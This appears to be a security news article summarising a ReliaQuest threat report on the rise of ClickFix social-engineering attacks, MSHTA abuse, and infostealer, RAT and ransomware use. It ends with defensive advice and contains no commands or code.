Security researchers have warned of the growing use of ClickFix social engineering techniques to bypass security controls, deploy infostealers and remote access Trojans (RATs), and help ransomware campaigns.
ClickFix tricks users into executing malicious commands by urging them to fix a non-existent problem through a series of steps, often using fake pop-ups to add legitimacy.
ReliaQuest claimed in its latest Threat Spotlight report for March-May 2025 that ClickFix was key in propelling detected drive-by-comprises by 10% over the previous reporting period.
It also enabled an increase in attacks using MSHTA, a native Windows binary for running HTML application files. Because this is a legitimate tool, it enables threat actors to bypass traditional security controls designed to detect file-based delivery methods like phishing, the report noted.
“In the previous reporting period, the rise in MSHTA abuse was largely attributed to ‘ClearFake,’ a JavaScript framework that used deceptive CAPTCHAs to convince users to execute malicious MSHTA commands,” it continued.
“ClearFake’s early adoption of ClickFix techniques propelled MSHTA from 16th to second place among defense evasion tactics.”
MSHTA now accounts for a third of defense evasion attacks, ReliaQuest said.
Read more on ClickFix: ‘ClickFix’ Cyber-Attacks for Malware Deployment on the Rise
The report revealed that ClickFix is also being used to deploy Lumma Stealer and “SectopRAT,” a .NET-based RAT.
“Attackers leveraged ClickFix and a malvertising campaign using fake Google ads to distribute malicious Google Chrome installers hiding the malware,” the report said.
“Both methods allowed attackers to exfiltrate credentials and establish backdoors for further exploitation, making SectopRAT a rising threat.”
ClickFix is a potentially “game-changing initial access technique,” ReliaQuest warned, arguing that it’s helping adversaries deliver payloads successfully through trusted tools like PowerShell.
Ransomware Actors Take Up ClickFix
The threat intelligence firm claimed that ClickFix is likely to gain traction among ransomware actors.
“ClickFix’s ability to evade detection by using trusted tools like MSHTA makes it a highly appealing technique for ransomware operators,” it concluded.
“Currently used in malware campaigns, ClickFix has proven highly effective at bypassing traditional defenses such as email filters and endpoint protection. Given its success, we anticipate that 30% of RaaS affiliates will integrate this technique in the short term, streamlining operations and scaling their campaigns.”
RealiQuest urged organizations to restrict access to the Windows Run prompt for non-admin users in order to prevent attackers using it during ClickFix campaigns.
